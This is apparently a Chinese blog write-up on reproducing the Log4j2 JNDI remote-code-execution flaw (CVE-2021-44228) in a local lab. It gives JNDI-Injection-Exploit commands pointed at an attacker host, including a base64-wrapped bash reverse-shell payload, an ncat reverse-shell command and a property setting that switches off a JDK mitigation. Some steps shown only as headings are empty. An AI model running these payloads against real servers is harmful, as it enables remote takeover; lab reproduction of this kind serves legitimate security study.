一、环境搭建

Tips: 本文出自一个Java废物，如果不对或者不足的地方欢迎大佬提出来或补充

1、推荐本地docker的方式搭建

docker pull vulfocus/log4j2-rce-2021-12-09:latest

2、使用本地环境

推荐使用https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce进行搭建，方便快捷

二、GETSHELL遇到的问题

1、关于提示RFC 7230的问题

Content-Type: application/x-www-form-urlencoded
# 需要在请求头中加上Content-Type

2、高版本的Macos如何安装低版本的JDK

set theDMG to choose file with prompt "Please select javaforosx.dmg:" of type {"dmg"}
do shell script "hdiutil mount " & quoted form of POSIX path of theDMG
do shell script "pkgutil --expand /Volumes/Java\\ for\\ macOS\\ 2017-001/JavaForOSX.pkg ~/tmp"
do shell script "hdiutil unmount /Volumes/Java\\ for\\ macOS\\ 2017-001/"
do shell script "sed -i '' 's/return false/return true/g' ~/tmp/Distribution"
do shell script "pkgutil --flatten ~/tmp ~/Desktop/Java.pkg"
do shell script "rm -rf ~/tmp"
display dialog "Modified Java.pkg saved on desktop" buttons {"Ok"}

然后桌面找到Java.pkg即可

然后安装在/Library/Java/JavaVirtualMachines/1.6.0.jdk/Contents/Home目录下，然后vim一下配置，增加快捷命令

最后再source一下

这样就可以动态的切换jdk版本了

3、关于报Reference Class Name: foo的解决办法

因为在2018年10月，Java最终也修复了这个利用点，对LDAP Reference远程工厂类的加载增加了限制11.0.1、8u191、7u201、6u211 com.sun.jndi.ldap.object.trustURLCodebase 默认为false

主要存在版本的限制

服务器上的版本太高的问题

1、方法一

需要加上以下代码即可复现

因为在2018年10月，Java最终也修复了这个利用点，对LDAP Reference远程工厂类的加载增加了限制11.0.1、8u191、7u201、6u211 com.sun.jndi.ldap.object.trustURLCodebase 默认为false

System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");

2、方法二

对于这种

可以使用payload

 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "touch /tmp/asd" -A 192.168.124.2  

网上很多复现教程都没有说，在这里需要选择什么，这里需要选择rmi也就是

随后

服务器上同理

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,base64}|{base64,-d}|{bash,-i}" -A xxxxx

4、关于MacOs下复现报错java.io.IOException: Cannot run program “ncat -e /bin/bash xxx”: error=2, No such file or directory

当前JDK版本

这里主要是因为POC的问题，这里需要构造一个类似于字符串的一个序列一样，不能直接写完整的命令

错误的写法

正确的写法

随后运行，成功反弹Shell

弹计算器

三、使用的工具

https://github.com/welk1n/JNDI-Injection-Exploit

https://github.com/RandomRobbieBF/marshalsec-jar

四、参考

https://www.cnblogs.com/zpchcbd/p/14941783.html

https://www.jianshu.com/p/95dfdcfb952a

https://stackoverflow.com/questions/59409811/illegalargumentexception-the-http-header-line-does-not-conform-to-rfc-7230-when

http://www.hackdig.com/04/hack-81555.htm

https://coderedirect.com/questions/556419/cannot-run-program-error-2-no-such-file-or-directory-java

https://xz.aliyun.com/t/6633#toc-5